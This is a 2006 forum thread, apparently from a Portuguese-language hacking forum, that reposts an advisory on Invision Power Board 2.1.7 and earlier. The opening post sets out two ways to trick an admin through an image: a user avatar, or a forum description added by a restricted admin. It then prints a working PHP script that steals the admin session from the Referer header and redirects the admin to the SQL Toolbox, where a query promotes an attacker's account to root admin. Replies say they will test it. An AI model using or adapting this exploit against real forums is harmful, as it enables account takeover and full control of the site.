Invision Power Board Multiple Vulnerabilities

Started by insanity, 06 de October , 2006, 03:24:20 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

insanity

06 de October , 2006, 03:24:20 PM
Invision Power Board Multiple Vulnerabilities
Affects: IPB <=2.1.7
Risk: High
Author: rapigator

An attack exists where an admin can be redirected and
forced to execute SQL commands through IPB's SQL
Toolbox.

The following requirements must be met for this attack
to take place:
- The database table prefix must be known
- The admin must have access to the SQL Toolbox (any
"root admin")
- The admin must have images and referers turned on in
their browser, and their browser must follow Location
headers (default behaviour for most browsers)
- The admin must view a malicious script as an image
in their browser.


This attack works invisibly to the admin because only
the image is redirected, not the page.


1st method:
In this method, any user can force the admin to
execute SQL commands.

1. A user sets their avatar to the malicious script's
address
2. The admin looks up the user's account in the Admin
CP
3. The user's avatar is shown and the admin is
redirected....


2nd method:
A restricted admin can add any HTML to a forum's
description(including javascript).

1. A restricted admin adds the malicious script as an
image to a forum's description.
2. Upon going to the "Manage Forums" link in Admin CP,
an unrestricted admin will be redirected and the SQL
will be executed.


Example malicious image script:
Code Select
<?php

//The member id to promote to root admin
$mid 145;

//The database prefix (usually "ibf_")
$prefix "ibf_";

if (preg_match('/(&#46;*adsess=[\\w&#93;{32})/',
$_SERVER['HTTP_REFERER'&#93;, $admin_loc) and $mid)
{
 header("Location&#58;
"&#46;$admin_loc[1&#93;&#46;"&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where+id%3D{$mid}+LIMIT+1");
}

?>
Obs: não testei aínda, quem quizer fazer download do Invision Power Board ...

Code Select
http://insanity.netsons.org/ipb2.1.7.rar
ate mais

mrx

#1
07 de October , 2006, 05:22:16 PM
To baxando valeu por disponibilizar o Lick pra galera

mt boa a vulnerabilidade vou testar aki

Vlw


Voltando a ativa. ;P

HadeS

#3
02 de May , 2007, 03:04:45 PM
Na verdade, acho que esse negócio de precisar de acesso admin pra invadir é meio tosco.

Tudo bem que você pode aumentar os privilégios, e tal, mas são vários fatores, é meio difícil todas as condições baterem.

Mas mesmo assim ainda vale a pena contribuir, valeu insanity. ;)

HadeS
Print
Go Up Pages1
User actions